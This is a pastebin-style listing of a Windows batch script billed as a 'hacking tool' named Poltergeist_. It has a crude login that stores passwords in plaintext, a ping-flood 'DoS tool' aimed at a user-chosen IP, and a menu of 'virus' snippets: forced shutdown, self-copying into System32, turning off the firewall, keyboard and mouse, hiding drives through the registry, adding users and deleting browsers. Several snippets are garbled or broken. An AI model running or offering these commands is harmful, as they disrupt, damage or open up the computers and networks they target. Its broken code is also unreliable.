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Jan 18th, 2017
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Batch 7.45 KB | None | 0 0
  2. VERSIONE 0.2
  7. @echo off
  8. title Poltergeist_  AnAr?chY! 2016®
  9. cls
  10. color 0a
  11. echo Poltergeist_     Made By AnAr?chY!®
  12. echo Warning!
  13. echo ======================================
  14. echo This hacking tool is not a game.
  15. echo Use at your own risk.
  16. echo You have been warned!
  17. ping localhost -n 2 >nul
  18. ping localhost -n 2 >nul
  19. ping localhost -n 2 >nul
  21. :no
  22. color 0a
  23. cls
  24. echo Poltergeist_     Made By AnAr?chY!®
  25. echo Accounts
  26. echo ===========================================
  27. echo.
  28. echo 1 Log In
  29. echo 2 Sign Up
  30. echo 3 Exit
  31. echo.
  32. set /p op=
  33. if %op%==1 goto 1
  34. if %op%==2 goto 2
  35. if %op%==3 goto 3
  36. goto error1
  37. :error 1
  38. cls
  39. echo Error 201
  40. echo ===========
  41. echo Please, Try again.
  42. echo Press a key to continue!
  43. pause>nul
  44. goto no
  45. :2
  46. color 0a
  47. cls
  48. echo Sign Up
  49. echo ======================================
  50. echo.
  51. set /p newname="Enter new username:"
  52. if "%­newname%"=="%­newname%" goto inputname
  53. :inputname
  54. cd "%­userprofile%\documents"
  55. if exist "Poltergeist_Files" goto skip
  56. if not exist "cmdacoBin" goto noskip
  57. :noskip
  58. md "Poltergeist_Files"
  59. goto skip
  60. :skip
  61. cd "%­userprofile%\documents\Poltergeist_Files"
  62. if exist "%­newname%.bat" goto namexist
  63. if not exist "%­newname%.bat" goto skip2
  64. :skip2
  65. echo set realusername=%­newname%> "%­newname%.bat"
  66. goto next
  67. :next
  68. color 0a
  69. echo.
  70. set /p pswd=Enter new Password:
  71. if "%­pswd%"=="%­pswd%" goto inputpass
  72. :inputpass
  73. cd "%­userprofile%\documents\Poltergeist_Files"
  74. echo set password=%­pswd%>> "%­newname%.bat"
  75. goto next1
  76. :namexist
  77. color 0a
  78. echo.
  79. echo The entered username already exists.
  80. echo Press any key to return. . .
  81. pause >nul
  82. goto 2
  83. :next1
  84. cls
  85. color 0a
  86. echo Poltergeist_ Accounts
  87. echo ============
  88. echo.
  89. echo Your account has been successfully created!
  90. echo.
  91. pause
  92. goto being0
  93. :1
  94. color 0a
  95. cls
  96. echo Poltergeist_ Accounts Log In
  97. echo ================================
  98. echo.
  99. Set /p logname=Username:
  100. if "%­logname%"=="%­logname%" goto 2.1
  101. :2.1
  102. echo.
  103. set /p logpass="Password:"
  104. if "%­logpass%"=="%­logpass%" goto login
  105. :login
  106. cd "%­userprofile%\documents\Poltergeist_Files"
  107. if exist "%­logname%.bat" goto call
  108. if not exist "%­logname%.bat" goto errorlog
  109. :call
  110. call "%­logname%.bat"
  111. if "%­password%"=="%­logpass%" goto logdone
  112. goto errorlog
  113. :errorlog
  114. color 0c
  115. echo.
  116. echo Username or Password incorrect.
  117. echo Access denied.
  118. pause >nul
  119. goto no
  120. :logdone
  121. cls
  122. color 0a
  123. echo Poltergeist_
  124. echo =================
  125. echo.
  126. echo Successfully logged in!
  127. echo.
  128. pause
  129. goto account
  130. :account
  131. color 0a
  132. cls
  133. cd "%­userprofile%\documents\Poltergeist_Files"
  134. call "%­realusername%color.bat"
  135. call "%­realusername%.bat"
  136. color %colorcode%
  137. cls
  138. echo.
  139. echo -------------------------------------------------------------------------------
  140. echo %­realusername%
  141. echo -------------------------------------------------------------------------------
  142. @echo off
  143. break off
  144. :being0
  147. cls
  148. echo Poltergeist_     Made By AnAr?chY!
  149. echo ===============================================
  150. echo Hi
  151. echo This is the Homepage. What do you want to do?
  152. echo a- DoS tool
  153. echo b- Viruses Script
  154. echo c- Use Pro CMD
  155. echo d- Contact Us
  156. echo e-
  157. echo -------------------------------------------
  158. set /P risp= Choice:
  159. if %­risp%== a goto a
  160. if %­risp%== b goto b
  161. if %­risp%== c goto m
  162. if %­risp%== d goto d
  163. if not %­risp%== a,b,c,d goto error45
  164. :error45
  165. cls
  166. echo Error 201
  167. echo ===========
  168. echo Please, Try again.
  169. echo Press a key to continue!
  170. pause>nul
  171. goto being0
  172. :a
  173. cls
  174. echo Poltergeist_     Made By AnAr?chY!
  175. echo DoS By AnAr?chY!
  176. echo ===========================================
  177. echo.
  178. set /P ip=Host:
  179. ping %­ip%
  180. echo.
  181. set /P i0=IP:
  182. set /P f=Packets Size:
  183. echo.
  184. echo.
  185. echo Are you sure to continue? [y/n]
  186. echo ==========================================
  187. set /P risp1=
  188. if %­risp1%== y goto y
  189. if %­risp1%== n goto n
  190. if %­risp1%== Y goto y
  191. if %­risp1%== N goto n
  192. if not %­risp1%== y,n,Y,N goto error2
  193. :error2
  194. cls
  195. echo Error 201
  196. echo ===========
  197. echo Please, Try again.
  198. echo Press a key to continue!
  199. pause>nul
  200. goto being0
  201. :y
  202. echo DoS is begin!
  203. @start ping %­i0% -t -l %f%
  204. goto being0
  205. :n
  206. cls
  207. echo Ok, Press a key to continue!
  208. pause>nul
  209. goto being0
  210. :b
  211. cls
  212. echo Poltergeist_     Made By AnAr?chY!
  213. echo Viruses Script
  214. echo.
  215. echo Here the are some Viruses Scripts:
  216. echo (Saves as .bat)
  217. echo =========================================
  218. echo.
  219. echo Shutdown the computer:
  220. echo shutdown /r /f /t 2
  221. echo.
  222. echo Copy your virus in System32:
  223. echo copy %0 %­windir%\system32\anything.bat
  224. echo.
  225. echo Disable firewall:
  226. echo netsh firewall set opmode mode=disable
  227. echo.
  228. echo Disable keyboard and mouse:
  229. echo rundll mouse,disable
  230. echo rundll keyboard,disable
  231. echo.
  232. echo Hide the virus:
  233. echo attrib +H +I +S %0
  234. :oppo
  235. echo.
  236. echo =========================================
  237. echo Part 1 of 2 is end, type "home" to return at the Homepage
  238. echo type "continue" to see more viruses scripts
  239. set /P nm= Choice:
  240. if %­nm%==home goto being0
  241. if %­nm%==continue goto cont
  242. if not %­nm%== home,continue goto err9009
  243. :err9009
  244. cls
  245. echo Error 201
  246. echo ===========
  247. echo Please, Try again.
  248. echo Press a key to continue!
  249. pause>nul
  250. goto oppo
  251. :c
  252. :cont
  253. echo.
  254. echo Disable all drivers:
  255. echo REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVer sion\\policies\\Explorer /v NoDrives /t REG_DWORD /d 12\n
  256. echo REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVer sion\\policies\\Explorer /v NoViewonDrive /t REG_DWORD /d 12\n
  257. echo.
  258. echo Create error message:
  259. echo echo X=MsgBox("your message here",16,"your title here") > anything.vbs
  260. echo.
  261. echo Change time:
  262. echo time 0.00
  263. echo.
  264. echo Make a new random user:
  265. echo net user %­random% /add
  266. echo.
  267. echo Delete internet explorer:
  268. echo @del/q/s c\programmi\inter~liexploer.exe
  269. echo.
  270. echo Delete firefox:
  271. echo @del/q/s c\programmi\mozill~firefox.exe
  272. :opo
  273. echo.
  274. echo =========================================
  275. echo Part 2 of 2 is end, type "home" to return at the Homepage
  276. set /P nm= Choice:
  277. if %­nm%==home goto being0
  278. if not %­nm%==home goto err909
  279. :err909
  280. cls
  281. echo Error 201
  282. echo ===========
  283. echo Please, Try again.
  284. echo Press a key to continue!
  285. pause>nul
  286. goto opo
  287. :m
  288. :home
  289. Title Command Prompt
  290. color 0a
  291. cls
  292. echo Poltergeist_ Made By AnAr?chY!
  293. echo =====================================
  294. echo.
  295. echo Type "home" any time to go to the current user profile directory.
  296. echo Type "desktop" any time to go to the current user desktop.
  297. echo.
  298. echo Type "being0" any time to go to the Homepage.
  299. echo.
  300. pause
  301. cls
  302. :cmd
  303. echo Poltergeist_     Made By AnAr?chY!
  304. echo Directory: %CD%
  305. echo ============================================
  306. set /P CMD=Command:
  307. if "%CMD%" == "being0" goto being0
  308. if "%CMD%" == "home" goto home2
  309. if "%CMD%" == "desktop" goto desktop
  310. if "%CMD%" == "red" goto red
  311. if "%CMD%" == "green" goto green
  312. if "%CMD%" == "normal" goto normal
  313. %CMD%
  314. cd C:\
  315. goto cmd
  316. :home2
  317. cd /d %­USERPROFILE%
  318. cls
  319. goto cmd
  320. :desktop
  321. cd /d %­SystemDrive%\Users\%­USERNAME%\Desktop
  322. cls
  323. goto cmd
  324. :red
  325. color 0c
  326. cls
  327. goto cmd
  328. :green
  329. color 0a
  330. cls
  331. goto cmd
  332. :normal
  333. color 07
  334. cls
  335. goto cmd
  336. :d
  337. cls
  338. color 0a
  339. echo Poltergeist_  Made By AnAr?chY!
  340. echo ===================================
  341. echo Hi!
  342. echo You can contact us at this mail address:
  343. echo Contact us if you find any bugs or any problems!
  344. echo -AnAr?chY!
  345. echo.
  346. echo Pres any key to continue!
  347. pause>nul
  348. goto being0
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